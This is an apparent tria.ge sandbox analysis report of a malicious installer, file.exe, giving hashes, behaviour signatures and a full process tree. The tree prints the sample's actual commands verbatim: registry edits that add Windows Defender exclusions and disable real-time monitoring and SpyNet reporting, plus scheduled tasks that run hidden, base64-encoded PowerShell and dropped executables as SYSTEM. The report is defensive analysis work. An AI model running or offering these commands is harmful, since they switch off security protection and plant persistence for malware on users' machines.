Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    28/09/2022, 06:58

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    884d00f5dd73059b4d0977eedb5fe469

  • SHA1

    0ebb04cc77556014e9b629eced8e2053d0020671

  • SHA256

    8a2aa3c279ec21bfe7142d6ab8ce7b0e92d204da9342a6560f7c60f60b802599

  • SHA512

    5b794e77cf2abd428f1ae1bb0f8e247d4daf4c3fc6cd68d1e9d633d67dc401519719c0763c527bb89a586e2af036c471f8097d870af99bab4d81a11875f0af75

  • SSDEEP

    196608:91O0MgWawLC1tqlXAt55y1YsY3Nzb0caONfv1h6w:3OmT482uNp8k

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 22 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Users\Admin\AppData\Local\Temp\7zS3AA.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Users\Admin\AppData\Local\Temp\7zS761.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1176
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:816
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1596
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1100
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:1984
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1112
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1612
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1452
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1912
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gvGTDIaMB" /SC once /ST 03:49:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:2020
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gvGTDIaMB"
                  4⤵
                    PID:1480
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gvGTDIaMB"
                    4⤵
                      PID:564
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 07:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fDamkvw.exe\" d8 /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:1492
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {E17A9D29-D905-4E65-915D-105781E02B4A} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
                1⤵
                  PID:1896
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1464
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:1192
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1888
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:1904
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:800
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:944
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1548
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:1032
                        • C:\Windows\system32\gpscript.exe
                          gpscript.exe /RefreshSystemParam
                          1⤵
                            PID:1544
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {5B9E991F-6592-4ACC-B9D5-3827FE6C56A6} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:1688
                              • C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fDamkvw.exe
                                C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fDamkvw.exe d8 /site_id 525403 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:720
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gnsoXEexx" /SC once /ST 05:07:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:784
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gnsoXEexx"
                                  3⤵
                                    PID:1820
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gnsoXEexx"
                                    3⤵
                                      PID:1544
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                        PID:1420
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:840
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        3⤵
                                          PID:552
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            4⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            PID:1636
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gxOZSLDRp" /SC once /ST 01:38:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:612
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gxOZSLDRp"
                                          3⤵
                                            PID:1528
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gxOZSLDRp"
                                            3⤵
                                              PID:2000
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:1892
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1436
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:2028
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1708
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:1540
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1008
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:1280
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1044
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\fwhiGQHhSfnZUzkc\HfRgmnNW\nbOCdoWqKxrbMxdt.wsf"
                                                          3⤵
                                                            PID:1636
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\fwhiGQHhSfnZUzkc\HfRgmnNW\nbOCdoWqKxrbMxdt.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:1520
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1528
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1608
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1612
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1984
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1672
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1032
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:516
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1864
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:756
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1632
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:932
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:2024
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1540
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:604
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1636
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1156
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:716
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:1112
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1944
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:800
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:1940
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:1716
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:32
                                                                            4⤵
                                                                              PID:1180
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                                PID:1604
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                • Windows security bypass
                                                                                PID:1632
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:2028
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:1640
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:1956
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                        PID:612
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                          PID:1368
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:1728
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:1952
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gyHhRlVRw" /SC once /ST 06:18:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:716
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gyHhRlVRw"
                                                                                            3⤵
                                                                                              PID:1612
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gyHhRlVRw"
                                                                                              3⤵
                                                                                                PID:1388
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                3⤵
                                                                                                  PID:840
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                    4⤵
                                                                                                      PID:1192
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                    3⤵
                                                                                                      PID:828
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                        4⤵
                                                                                                          PID:1376
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "HqggdVJZxuzvaULcA" /SC once /ST 05:33:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\FqDMnCs.exe\" Av /site_id 525403 /S" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:1640
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "HqggdVJZxuzvaULcA"
                                                                                                        3⤵
                                                                                                          PID:1648
                                                                                                      • C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\FqDMnCs.exe
                                                                                                        C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\FqDMnCs.exe Av /site_id 525403 /S
